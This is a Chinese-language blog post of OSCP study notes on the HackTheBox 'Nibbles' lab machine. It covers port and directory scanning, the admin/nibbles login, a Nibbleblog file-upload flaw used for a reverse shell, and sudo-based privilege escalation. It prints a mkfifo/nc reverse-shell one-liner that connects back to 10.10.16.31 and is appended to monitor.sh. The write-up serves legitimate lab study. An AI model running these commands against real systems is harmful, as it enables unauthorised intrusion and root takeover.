OSCP备考_0x03_HackThBox靶机_Linux_nibbles

Ethan医生7个月前靶场243

信息收集

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.193.19 (扫描TCP)

image.png


nmap -sU --top-ports 100 10.129.193.19 (扫描UDP)



http://10.129.193.19/,F12发现

image.png

image.png

应该有入口点


image.png



爆破路径看看有没有啥


gobuster dir -u http://10.129.193.19/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html,txt -t 50

gobuster dir -u http://10.129.193.19/nibbleblog -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html,txt -t 50

image.png

上面信息可以查看到版本

image.png

有上传文件漏洞,查看怎样利用反弹SHELL

admin/nibbles 登入账号密吗,由于原本爆破导致机器禁止访问

image.png

找到My image进行上传文件

image.png

然后监听nc -lvnp 3333


image.png

开始提权

sudo -l发现

image.png

然后开始创建monitor.sh

poc:echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.31 3334 >/tmp/f' | tee -a /home/nibbler/personal/stuff/monitor.sh

image.png

标签: OSCP

相关文章

OSCP备考_0x34_HackThBox靶机_time

OSCP备考_0x34_HackThBox靶机_time

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.107.34 (扫描TCP)nmap -sU --top-ports 100 ...

 OSCP备考_0x35_HackThBox靶机_Ready

OSCP备考_0x35_HackThBox靶机_Ready

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.92.20 (扫描TCP)http://10.129.92.20:5080/dashbo...

OSCP备考_0x27_HackThBox靶机_Linux_ Admirer

OSCP备考_0x27_HackThBox靶机_Linux_ Admirer

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.128.76 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x57_HackThBox靶机_Windows_Love

OSCP备考_0x57_HackThBox靶机_Windows_Love

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.48.103 (扫描TCP)绑定域名 http://10.129.48.103...

OSCP备考_0x16_Vulnhub靶机_Matrix: 3

OSCP备考_0x16_Vulnhub靶机_Matrix: 3

名称说明靶机下载链接https://www.vulnhub.com/entry/matrix-3,326/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168...

OSCP备考_0x26_HackThBox靶机_Linux_magic

OSCP备考_0x26_HackThBox靶机_Linux_magic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.216.125 (扫描TCP)nmap -sU --top-ports 100 ...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。